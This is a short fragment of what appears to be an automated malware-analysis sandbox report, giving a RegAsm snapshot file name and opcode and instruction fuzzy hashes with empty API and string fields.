                                                            • Snapshot File: hcaresult_41_2_10f7000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfad0231a15ad87ae7c7cef905a63df46cc2563895432aae1d2dd2fd85d9753e
                                                            • Instruction ID: 823ce3fb8f88ccb97502025e73d95335165629f5cb1d1664b8fc147cf47a55b1
                                                            • Opcode Fuzzy Hash: cfad0231a15ad87ae7c7cef905a63df46cc2563895432aae1d2dd2fd85d9753e
                                                            • Instruction Fuzzy Hash: 4FD0C91500E7C08FC3479B3489664D13F70FD0310431A85CBC0848F5B3E616540BD76B